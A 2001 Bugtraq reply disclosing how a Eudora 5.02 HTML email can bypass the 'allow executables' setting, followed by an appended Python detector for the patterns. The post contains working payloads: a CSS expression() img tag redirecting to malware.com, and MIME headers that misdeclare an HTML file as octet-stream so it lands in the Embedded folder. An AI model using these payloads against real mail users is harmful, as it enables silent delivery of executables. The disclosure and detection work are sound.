Bugtraq mailing list archives
Re: feeble.you!dora.exploit
From: "http-equiv () excite com" <http-equiv () excite com>
Date: Tue, 20 Mar 2001 11:23:48 -0800
|Jeff Beckley wrote:
|
|At 01:38 AM 3/18/2001 -0800, http-equiv () excite com wrote:
|>Silent delivery and installation of an executable on a target
|>computer. No client input other than opening an email using Eudora
|>5.02 - Sponsored Mode provided 'use Microsoft viewer' and 'allow
|>executables in HTML content' are enabled.
|
|The "Allow executables in HTML content" setting is turned off by
|default. The online help and user manual mention that the setting
|should remain off for security reasons.

This of course is 100% correct. Unfortunately on closer examination we find that this too can be defeated quite easily. Consider the following non-JavaScript:

<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<img SRC="file://C:\WINDOWS\APPLIC~1\QUALCOMM\EUDORA\Embedded\malware.gif" height=2 width=2 STYLE="left:expression(location.href='http://www.malware.com');"></html>
<br>
<br>
</body></html>

This slips through, with "Allow executables in HTML content" disabled. Therefore the results will be the same:

<img SRC="" height=1 width=1 STYLE="left:expression(malware.location.href='cid:malware.com');"></ ...etc

Disable the 'Microsoft Viewer' thing. That's the problem.

A good repair can be by reviewing all the necessary tricks to inject JavaScript into Hotmail Accounts. These are well documented here and dating back for quite some time. It appears the mail client seeks typical script tags, which is defeated as above.

Additionally you might want to not allow a crafted inline file to transfer automatically to your embedded folder:

Content-Type: application/octet-stream; charset=iso-8859-1
Content-ID: <malware.com>
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="You!DORA.html"

We note that if the content-type is manipulated we can route the file to the 'Embedded' folder. Casual observation suggests image files and *.exe are routed there. While *.html is not, hence the constructed

Content-Type: application/octet-stream; charset=iso-8859-1

while the file is:

Content-Disposition: inline; filename="You!DORA.html"

---
http://www.malware.com
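
A defensive check for the two patterns described in the message above, added here as an example (it is not part of the original post and not Eudora's code): it flags HTML parts that carry a CSS expression() or a file: source, and inline parts declared as application/octet-stream whose filename is renderable content. The function name, the extension list and the sample message are assumptions made for the illustration.

```python
import email
import re
from email import policy

ACTIVE_EXT = (".html", ".htm", ".hta", ".js", ".vbs")  # assumed list, extend as needed
# CSS dynamic property: script that runs with no <script> tag present.
CSS_EXPR = re.compile(r"style\s*=\s*[\"'][^\"']*expression\s*\(", re.I)
# src= pointing at the local disk instead of a cid: or http: resource.
LOCAL_SRC = re.compile(r"src\s*=\s*[\"']?file:", re.I)

def audit_message(raw: bytes) -> list[str]:
    """Return findings for one RFC 822 message (hypothetical helper)."""
    findings = []
    for part in email.message_from_bytes(raw, policy=policy.default).walk():
        if part.is_multipart():
            continue
        ctype = part.get_content_type()
        fname = (part.get_filename() or "").lower()
        if ctype == "text/html":
            html = part.get_content()
            if CSS_EXPR.search(html):
                findings.append("css-expression")
            if LOCAL_SRC.search(html):
                findings.append("local-file-src")
        # Declared type says opaque binary, filename says renderable content.
        if (part.get_content_disposition() == "inline"
                and ctype == "application/octet-stream"
                and fname.endswith(ACTIVE_EXT)):
            findings.append(f"type-mismatch:{fname}")
    return findings

# Constructed sample message (not taken from the post; payload is an empty HTML page).
SAMPLE = b"""\
MIME-Version: 1.0
Content-Type: multipart/related; boundary="b1"

--b1
Content-Type: text/html; charset=iso-8859-1

<html><body><img SRC="file://C:/x/y.gif" height=2 width=2
 STYLE="left:expression(location.href='http://example.invalid');"></body></html>
--b1
Content-Type: application/octet-stream; charset=iso-8859-1
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="sample.html"

PGh0bWw+PC9odG1sPg==
--b1--
"""

if __name__ == "__main__":
    print(audit_message(SAMPLE))
```

A mail gateway or client could quarantine or strip any part that produces a finding before the message reaches an HTML rendering component.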